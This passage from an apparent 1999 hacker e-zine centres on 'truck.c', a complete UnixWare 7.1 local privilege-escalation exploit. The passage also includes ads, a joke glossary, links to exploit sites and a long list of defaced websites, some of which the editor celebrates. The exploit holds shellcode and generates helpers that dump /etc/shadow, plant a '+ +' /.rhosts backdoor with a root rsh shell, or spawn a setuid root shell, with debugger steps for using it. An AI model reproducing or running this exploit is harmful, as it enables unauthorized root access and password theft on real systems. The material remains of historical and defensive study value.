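            return OPT_BAD_LENGTH;    /* too small to be real, or runs past the end */
        i += olen;
    }
    return OPT_OK;
}

/* Constructed samples. */
static const uint8_t sample_one_byte[] = { 0x07 };   /* 1-byte buffer, as with OPT_SIZE 1 */
static const uint8_t sample_rr[]       = { 0x07, 0x07, 0x04, 0, 0, 0, 0, 0x00 };
static const uint8_t sample_overrun[]  = { 0x07, 0x0b, 0x04, 0, 0, 0, 0 };
static const uint8_t sample_tiny_len[] = { 0x01, 0x44, 0x01 };

int main(void)
{
    static const char *names[] = { "ok", "too long", "truncated", "bad length" };

    printf("one byte : %s\n", names[check_ip_options(sample_one_byte, sizeof(sample_one_byte))]);
    printf("rr + eol : %s\n", names[check_ip_options(sample_rr, sizeof(sample_rr))]);
    printf("overrun  : %s\n", names[check_ip_options(sample_overrun, sizeof(sample_overrun))]);
    printf("tiny len : %s\n", names[check_ip_options(sample_tiny_len, sizeof(sample_tiny_len))]);
    return 0;
}
```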
      
      @HWA
      
43.0  truck.c UnixWare 7.1 local exploit by Brock Tellier.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~       
      
      /** 
       ** "Its a hole you could drive a truck through." 
       **                        -Aleph One
       **
       ** truck.c UnixWare 7.1 security model exploit
       ** Demonstrates how we own privileged processes 
       ** 
       ** Usage: cc -o truck truck.c
       ** ./truck <filetype>  where filetype is 1, 2 or 3 
       ** (for dacread, dacwrite and setuid, respectively)
       **
       ** This will put $XNEC in the environment and run a shell.
       ** From there you must use gdb/debug to load a file of the
       ** type you chose (by checking /etc/security/tcb/privs)
       ** and setting a breakpoint at _init via "break _init".
       ** When you "run" and break at _init, change your EIP
       ** to something between 0x8046000 and 0x8048000 with 
       ** "set $eip = 0x8046b75" and "continue" twice.
       **
       **
       ** Brock Tellier btellier@usa.net
       **/ 
      
      
      #include <stdlib.h>
      #include <stdio.h>
      
      char scoshell[]= /* This isn't a buffer overflow! really! */
      "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
      "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
      "\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
      
                             
      #define LEN 3500
      #define NOP 0x90
      
      #define DACWRITE "void main() { system(\"echo + + > /.rhosts; chmod 700 \
      /.rhosts; chown root:sys /.rhosts; rsh -l root localhost sh -i \
      \"); }\n"
      #define DACREAD  "void main() { system(\"cat /etc/shadow\");}\n"
      #define SETUID  "void main() { setreuid(0,0);system(\"/bin/sh\"); }\n"
      
      void usage(int ftype) {
          fprintf(stderr, "Error: Usage: truck [filetype]\n");
          fprintf(stderr, "Where filetype is one of the following: \n");
          fprintf(stderr, "1 dacread\n2 dacwrite\n3 setuid\n");
          fprintf(stderr, "Note: if file has allprivs, use setuid\n");
      }
      void buildsm(int ftype) {
        FILE *fp;
        char cc[100];
        fp = fopen("/tmp/sm.c", "w");
      
        if (ftype == 1) fprintf(fp, DACREAD);
          else if(ftype == 2) fprintf(fp, DACWRITE);
          else if(ftype == 3) fprintf(fp, SETUID);
      
        fclose(fp);
        snprintf(cc, sizeof(cc), "cc -o /tmp/sm /tmp/sm.c");
        system(cc);
      
      }
      
      int main(int argc, char *argv[]) {
        int i;
        int buflen = LEN;
        char buf[LEN]; 
        int filetype = 0;
        char filebuf[20]; 
      
        if(argc > 2 || argc == 1) {
          usage(filetype);
          exit(0); 
        }
      
        if ( argc > 1 ) filetype=atoi(argv[1]);
        if ( filetype > 3 || filetype < 1 ) { usage(filetype); exit(-1); }
          buildsm(filetype);
      
        fprintf(stderr, "\nUnixWare 7.1 security model exploit\n");
        fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
      
        memset(buf,NOP,buflen);
        memcpy(buf+(buflen - strlen(scoshell) - 1),scoshell,strlen(scoshell));
      
        memcpy(buf, "XNEC=", 5);
        putenv(buf);
        buf[buflen - 1] = 0;
      
        system("/bin/sh");
        exit(0);
      }
      /*                    www.hack.co.za                    */
      
      @HWA
      
      
      
      -=----------=-         -=----------=-        -=----------=-       -=----------=- 
                                           
                                             0                                     
                                             0                                     
                                             0
                                             o
                                           O O O   
                                             0
                                                                     
                                                                                  
      =----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
      
      =----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
     
     
         



     
     
     
     
     
AD.S  ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                              _                _   _     _
                     /\      | |              | | (_)   (_)
                    /  \   __| |_   _____ _ __| |_ _ ___ _ _ __   __ _
                   / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
                  / ____ \ (_| |\ V /  __/ |  | |_| \__ \ | | | | (_| |
                 /_/    \_\__,_| \_/ \___|_|   \__|_|___/_|_| |_|\__, |
                                                                  __/ |
                                                                 |___/
                                                                 
                                                                 
       ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE                                                                  
       
       
                      http://revenger.hypermart.net
                               REVENGER's
    
              T E X T Z             F I L E                 HOMEPAGE
                        http://revenger.hypermart.net
    
                   Here you may find up to 340 text files for:
         ANARCHY , HACKING , GUIDES , CRACKING , VIRUS , GENERAL , ELECTRONICS ,
         UNIX , MAGAZINES , TOP SECRET , CARDING , U.F.O.s , LOCKPICKING , IRC ,
         PHREAKING , BOOKS AND A-S FILES AVAILABLE!
    
                        http://revenger.hypermart.net
    
                                Visit Us Now !
           
       
         
       
                                               .
                                                        .
               ...............          .
               :             :     .  . . .  .          .
             __:________     :          :   ___________ . .   .
             \       < /_____:___       :  (      < __( :_______
              )                : )______:___\_     (___(     : /
        =====/________|_________/ < |      : (________________(======
               :           (__________________)         :wd!
               .             :          :               :
           - / -  w w w . h a c k u n l i m i t e d . c o m  - / -
               :        .  . . .  .     :               :
          .  . . .  .                   :...............:
                             .
               .


      
      
       *****************************************************************************
       *                                                                           *
       *           ATTRITION.ORG     http://www.attrition.org                      *
       *           ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
       *           ATTRITION.ORG     DoS Database, Crypto Archive                  *
       *           ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
       *                                                                           *
       *****************************************************************************      
              
 
 
       When people ask you "Who is Kevin Mitnick?" do you have an answer? 
 
       www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
       m www.2600.com ########################################ww.2600.com www.freeke
       vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
       com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
       kevin.com www.k#             FREE KEVIN!              #in.com www.kevinmitnic
       k.com www.2600.########################################om www.2600.com www.fre
       ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
       k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

       http://www.2600.com/  http://www.kevinmitnick.com
       
       
       +-----------------------------------------------------------------------------+
       | SmoG Alert ..           http://smog.cjb.net/        NEWS on SCIENCE         |
       | ===================     http://smog.cjb.net/        NEWS on SECURITY        |
       | NEWS/NEWS/NEWS/NEWS     http://smog.cjb.net/        NEWS on THE NET         |
       |                         http://smog.cjb.net/        NEWS on TECHNOLOGY      |
       +-----------------------------------------------------------------------------+
       
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
       *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
       *  http://www.csoft.net  One of our sponsors, visit them now  www.csoft.net   *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
       * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


         //////////////////////////////////////////////////////////////////////////////
        //  To place an ad in this section simply type it up and email it to        //
       //        hwa@press.usmc.net, put AD! in the subject header please. - Ed    //
      //     or cruciphux@dok.org                                                 //
      //////////////////////////////////////////////////////////////////////////////


     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Don't worry. worry a *lot*
     
      Send in submissions for this section please! ............c'mon, you KNOW you
      wanna...yeah you do...make it fresh and new...be famous...<sic> 
      
      Submitted by Deflux, check out his site at http://www.advdata.net/~deflux/
      
      
      Define your terms for software releases:
      
      Advanced User:  A person who has managed to remove a computer from its
                      packing materials.
      
      Power User:  A person who has mastered the brightness and contrast controls
                      on any computer monitor.
      
      American Made:  Assembled in America from parts made abroad.
      
      Alpha Test Version:  Too buggy to be released to the paying public.
      
      Beta Test Version:  Still too buggy to be released.
      
      Release Version:  Alternate pronunciation of "Beta Test Version".
      
      Sales Manager:  Last week's new sales associate.
      
      Consultant:  A former sales associate who has mastered at least one tenth
                      of the dBase III Plus Manual.
      
      Systems Integrator:  A former consultant who understands the term AUTOEXEC.BAT.
      
      AUTOEXEC.BAT: A sturdy aluminum or wooden shaft used to coax AT hard disks into
                      performing properly.
      
      Backup:  The duplicate copy of crucial data that no one bothered to make;
                      used only in the abstract.
      
      Clone:  One of the many advanced-technology computers IBM is beginning to
                      wish it had built.
      
      Convertible:  Transformable from a second-rate computer to a first-rate
                      doorstop or paperweight.  (Replaces the term "junior".)
      
      Copy Protection:  A clever method of preventing incompetent pirates from
                      stealing software and legitimate customers from using it.
      
      Database Manager:  A program that allows users to manipulate data in every
                      conceivable way except the absolutely essential way they
                      conceive of the day after entering 20 megabytes of raw data.
      
      EMS:  Emergency Medical Service;  often summoned in cases of apoplexy induced
              by attempts to understand extended, expanded, or enhanced memory specs.
      
      Encryption:  A powerful algorithmic encoding technique employed in the creation
                      of computer manuals.
      
      FCC-Certified:  Guaranteed not to interfere with radio or television reception
                      until you add the cable that is required to make it work.
      
      Hard Disk:  A device that allows users to delete vast quantities of data with
                      simple mnemonic commands.
      
      Integrated Software:  A single product that deftly performs hundreds of
                      functions that the user never needs and awkwardly
                      performs the half-dozen he uses constantly.
      
      Laptop:  Smaller and lighter than the average breadbox.
      
      Multitasking:  A clever method of simultaneously slowing down the multitude
                      of computer programs that insist on running too fast.
      
      Network:  An electronic means of allowing more than one person at a time to
                      corrupt, trash, and otherwise cause permanent damage to useful
                      information.
      
      Portable:  Smaller and lighter than the average refrigerator.
      
      Support:  The mailing of advertising literature to customers who have returned
                      a registration card.
      
      Transportability:  Neither chained to a wall nor attached to an alarm system.
      
      Printer:  An electromechanical paper shredding device.
      
      Spreadsheet:  A program that gives the user quick and easy access to a wide
                      variety of highly detailed reports based on highly inaccurate
                      assumptions.
      
      Thought Processor:  An electronic version of the intended outline procedure
                      that thinking people instantly abandon upon graduation
                      from high school.
      
      Upgraded:  Didn't work the first time.
      
      User Friendly:  Supplied with a full color manual.
      
      Very User Friendly:  Supplied with a disk and audiotape so the user need
                      not bother with the full color manual.
      
      Version 1.0:  Buggier than Maine in June;  eats data.
      
      Version 1.1:  Eats data only occasionally; upgrade is free, to avoid litigation
                      by disgruntled users of Version 1.0.
      
      Version 2.0:  The version originally planned as the first release, except for
                      a couple of data-eating bugs that just won't seem to go away;
                      no free upgrades or the company would go bankrupt.
      
      Version 3.0:  The revision in the works when the company goes bankrupt.
      
      Videotex:  A moribund electronic service offering people the privilege of
                      paying to read the weather on their television screens instead
                      of having Willard Scott read it to them free while they
                      brush their teeth.
      
      Warranty:  Disclaimer.
      
      Workstation:  A computer or terminal slavishly linked to a mainframe that does
                      not offer game programs.
      
      (The previous list of terms was copied from the
      Government Computer News, November 21, 1988 issue.  The
      original data was provided by the WIC Connection.)
      
      
      
       
       
 SITE.1 
      
      http://www.temporal.org/thescene/pics/
      
      Wonder who's behind the nick on IRC? or in the scene? check this link out
      to see some of the more well known people from around irc etc...
      
      
      http://www.hack.co.za/
      
      By: Gov-Boi
      
      Recently updated, looks clean, some graphics, not a bad layout, no more text
      only. always a good site for recent exploits, give it a visit.
      
      
      http://hhp.perlx.com/
      
      By: Loophole
      
      Very nice and well done site by an oldschool ninja... can be found on irc
      but don't harass him or he'll get medieval on your ass!...you can find
      exploits, advisories and the like here, it's a work in progress, brand
      new site. Looks promising! - Ed
      
      http://www.scriptkiddies.org/
      
      Well it had to happen, they even have merchandizing, check it out, more
      news, tech and otherwise, scene gossip, tips and articles. can u dig it?
      
      Note: new site, some stuff isn't setup yet but should be soon...at least
      it looks sweet. - Ed
      
           
            
            
      You can send in submissions for this section too if you've found 
      (or RUN) a cool site...
       
        
       
      @HWA
       
         
         
  H.W Hacked websites 
     ~~~~~~~~~~~~~~~~
    
                    ___|                  _ \               |
                   |      __| _` |\ \  / |   |  __| _ \  _` |
                   |     |   (   | `  <  |   | |    __/ (   |
                  \____|_|  \__,_| _/\_\\___/ _|  \___|\__,_|


      Note: The hacked site reports stay, especially with some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

          * Hackers Against Racist Propaganda (See issue #7)

     
      Haven't heard from Catharsys in a while; for those following their saga, visit
      http://frey.rapidnet.com/~ptah/ for 'the story so far'...
      
      Hacker groups breakdown is available at Attrition.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      check out http://www.attrition.org/mirror/attrition/groups.html to see who
      you are up against. You can often gather intel from IRC as many of these
      groups maintain a presence by having a channel with their group name as the
      channel name, others aren't so obvious but do exist.
      
      >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
      
      
      
      * Info supplied by the attrition.org mailing list.
      
      Listed oldest to most recent...
      
     
      
      Defaced domain: www.activedev.net
      Site Title: Active Development
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.activedev.net
      Operating System: Windows NT (IIS/4.0)
      Previously defaced on 99.12.18, 99.12.15, 99.12.07 by acidklown, pyrostorm666, pyrostorm666
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.chegamais.com.br
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.chegamais.com
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: image1.ouhsc.edu
      Site Title: University of Oklahoma Health Sciences Center
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/image1.ouhsc.edu       
      Defaced by: relogic       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.allianceenterprises.com
      Site Title: Alliance Enterprises
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.allianceenterprises.com       
      Defaced by: relogic       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.firstgpa.com
      Site Title: First American Group Purchasing Association
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.firstgpa.com       
      Defaced by: relogic       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.webdr.com
      Site Title: The WEB Doctor
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.webdr.com       
      Defaced by: relogic       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.benthic.com
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.benthic.com       
      Defaced by: Wolf
      Operating System: Irix (Rapidsite/Apa-1.3.4 FrontPage)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.teddies4ever.com
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.teddies4ever.com       
      Defaced by: WKD       
      Operating System: Solaris
       
       
      Defaced domain: www.harp-industries.com
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.harp-industries.
      Defaced by: inkk
      Operating System: Solaris 2.6 - 2.7
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.nsbrasil.org
      Site Title: Melckzedeck Aquino de Aracjo
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.nsbrasil.org
      Defaced by: Death Knights
      Operating System: Linux (Apache 1.3.4)
      HIDDEN comments in the HTML.
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.alas.net
      Site Title: Alexandre Simoes
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.alas.net
      Defaced by: Death Knights
      Operating System: Linux (Apache 1.3.4)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.thsrock.net
      Site Title: Trinity High School RockNet
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.thsrock.net
      Defaced by: Pezzdc
      Operating System: Windows NT (WebSitePro/2.3.15)
      Previously defaced on 99.12.16 by f1ber
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.cm-lisboa.pt
      Site Title: Câmara Municipal de Lisboa
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.cm-lisboa.pt
      Defaced by: F0rpaxe
      Operating System: Windows NT
      Attrition comment: This is the Web site for the Governor of Lisbon, the capital of Portugal
       
       
      Defaced domain: eagles.eems.giles.k12.va.us
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/eagles.eems.giles.k12.va.us
      Defaced by: verb0
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: games.eesite.com
      Site Title: Echelon Entertainment
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/games.eesite.com
      Defaced by: verb0
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
      
      Defaced domain: cardserver.eesite.com
      Site Title: Echelon Entertainment
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/cardserver.eesite.com
      Defaced by: verb0
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.itaipu.gov.br
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.itaipu.gov.br
      Defaced by: inferno.br
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.torahacademy.org
      Site Title: MTC Enterprises
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.torahacademy.org       
      Defaced by: unknown       
      Operating System: Windows NT (IIS/4.0)
      Previously defaced on 99.12.19 by f1ber
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.smc.com.br
      Site Title: SMC Internet Services
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.smc.com.br       
      Defaced by: Ass0mbracao       
      Operating System: Windows NT
      Potentially offensive content on defaced page.
       
       
      Defaced domain: sugok.chongju-e.ac.kr
      Site Title: ChongJu National University of Education
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/sugok.chongju-e.ac.k
      Defaced by: JvM
      Operating System: Solaris 2.6
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.map.org
      Site Title: MAP International
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.map.org       
      Defaced by: unknown
      Operating System: Solaris 2.6 - 2.7
      Previously defaced on  by 
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.arc.gov
      Site Title: Appalachian Regional Commission
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.arc.gov       
      Defaced by: phiber
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.fairus.org
      Site Title: FAIR
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.fairus.
      Defaced by: Ass0mbracao       
      Operating System: Windows NT (IIS/4.0)
      Previously defaced on 99.12.19  99.12.18 by 
      Potentially offensive content on defaced page.
      
      Defaced domain: facepe.pe.gov.br
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/facepe.pe.gov.br       
      Defaced by: Shadow       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.cisco.net
      Site Title: Cisco.Net
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.cisco.net       
      Defaced by: Digital Domination       
      Operating System: Digital Unix (Apache/1.2.6 FrontPage/3.0.4)
      Previously defaced on 99.12.19 by DD
      Potentially offensive content on defaced page.
       
       
      Defaced domain: eagles.eems.giles.k12.va.us
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/eagles.eems.giles.k12.va.us       
      Defaced by: acidklown       
      Operating System: Windows NT (IIS/4.0)
      Previously defaced on 99.12.21 by Verb0
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.theisp.net
      Site Title: Discovery Online, Inc.
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.theisp.net       
      Defaced by: Uneek Tech       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.virtualshack.com
      Site Title: virtualshack.com
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.virtualshack.com       
      Defaced by: BLN       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: members.geosoft.org
      Site Title: The Geosoft Network
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/members.geosoft.org       
      Defaced by: HiP       
      Operating System: Windows NT (Apache 1.3.9 Win32)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.thegolftravelcenter.com
      Site Title: Randy Young (THEGOLFRAVELCENTER-DOM)
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.thegolftravelcenter.com       
      Defaced by: Ass0mbracao       
      Operating System: NT
      Previously defaced on 99.12.19 by BLN
      Potentially offensive content on defaced page.
      Attrition comment: Also defaced www.smc.com.br
       
       
      Defaced domain: www.contrast-clothing.com
      Site Title: Contrast Clothing
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.contrast-clothing.com       
      Defaced by: unknown       
      Operating System: NT
      HIDDEN comments in the HTML.
       
       
      Defaced domain: www.oirm.bia.gov
      Site Title: Office of Information Resources Management, Bureau of Indian Affairs
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.oirm.bia.gov       
      Defaced by: phiber       
      Operating System: Windows NT
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.cya.ca.gov
      Site Title: California Department of Youth Authority
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.cya.ca.gov       
      Defaced by: phiber       
      Operating System: Windows NT
       
       
      Defaced domain: www.irr.bia.gov
      Site Title: Indian Reservation Roads Program, Bureau of Indian Affairs
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.irr.bia.gov       
      Defaced by: phiber       
      Operating System: Windows NT
       
       
      Defaced domain: www.ocf.anl.gov
      Site Title: Office of the Chief Financial Officer, Argonne National Labs
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.ocf.anl.gov       
      Defaced by: phiber       
      Operating System: Windows NT
       
       
      Defaced domain: www.calgold.ca.gov
      Site Title: CalGOLD Business Permits
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.calgold.ca.gov       
      Defaced by: phiber       
      Operating System: Windows NT
       
       
      Defaced domain: www.samaritan.org
      Site Title: Samaritan's Purse
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.samaritan.org       
      Defaced by: B.L.Z. Bub       
      Operating System: NT
      HIDDEN comments in the HTML.
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.zenworksmaster.com
      Site Title: ZENMaster
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.zenworksmaster.com       
      Defaced by: Ass0mbracao       
      Operating System: NT
      Previously defaced on 99.12.19 by BLN
      Potentially offensive content on defaced page.
      
      
      Defaced domain: www.fmc.gov
      Site Title: Federal Maritime Commission
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.fmc.gov       
      Defaced by: phiber       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: democrats.assembly.ca.gov
      Site Title: California State Assembly Democratic Caucus
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/democrats.assembly.ca.gov/
      Defaced by: phiber
      Operating System: Windows NT
      
      
      Defaced domain: www.taonline.com
      Site Title: DI-USA, Inc.
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.taonline.com       
      Defaced by: Pyrostorm666       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.pitt.ang.af.mil
      Site Title: Air National Guard
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.pitt.ang.af.mil       
      Defaced by: phiber       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.laredo.k12.tx.us
      Site Title: Texas K12 Schools
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.laredo.k12.tx.us       
      Defaced by: Ass0mbracao       
      Operating System: Windows NT or WFW 3.11
      Previously defaced on 99.12.16 by f1ber
      Potentially offensive content on defaced page.
      
      Defaced domain: www.dfi.ca.gov
      Site Title: State of California
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.dfi.ca.gov       
      Defaced by: phiber       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.h-c-v.org
      Site Title: HCV
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.h-c-v.org       
      Defaced by: ezoons       
      Operating System: FreeBSD 2.2.1
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.upshq.com
      Site Title: United Phreaks Syndicate
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.upshq.com       
      Defaced by: MOTHERFUCKER GRANDPA NIGZ       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.cssc.gov
      Site Title: Customer Systems Support Center
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.cssc.gov       
      Defaced by: phiber       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.jcomtraining.com
      Site Title: JCom Computer Training
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.jcomtraining.com       
      Defaced by: BLN       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.cascades-spa.com
      Site Title: 2032272 Nova Scotia Ltd
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.cascades-spa.com       
      Defaced by: BLN       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.drkenner.com
      Site Title: Dr. Harris Kenner
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.drkenner.com       
      Defaced by: BLN       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.lunarvision.com
      Site Title: Lunar Video Communications
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.lunarvision.com       
      Defaced by: BLN       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: cpma.apg.army.mil
      Site Title: Army Signal Command
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/cpma.apg.army.mil       
      Defaced by: THESAINT666       
      Operating System: NT
      Previously defaced on 99.12.04 by k-0s
       
       
      Defaced domain: www.k9express.com
      Site Title: RD&K Associated
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.k9express.com       
      Defaced by: BLN       
      Operating System: NT
       
       
      Defaced domain: www.bankerusa.com
      Site Title: Banker of USA Mortgage
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.bankerusa.com       
      Defaced by: THESAINT666       
      Operating System: Windows NT (IIS/3.0)
      Previously defaced on 99.04.23 by tonekore
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.freezonez.com
      Site Title: Blasie Tech
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.freezonez.com       
      Defaced by: wired       
      Operating System: FreeBSD (Apache 1.2.6)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.infoctr.edu
      Site Title: Library of International Relations
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.infoctr.edu       
      Defaced by: THESAINT666       
      Operating System: NT
       
       
      Defaced domain: www.hotelsmexico.com
      Site Title: Posadas de Mexico
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.hotelsmexico.com       
      Defaced by: THESAINT666       
      Operating System: NT
       
       
      Defaced domain: www.leet-2000.com
      Site Title: anastacio esteviz
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.leet-2000.com       
      Defaced by: styles       
      Operating System: BSDI (Apache 1.3.6)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.expoente.com.br
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.expoente.com.br       
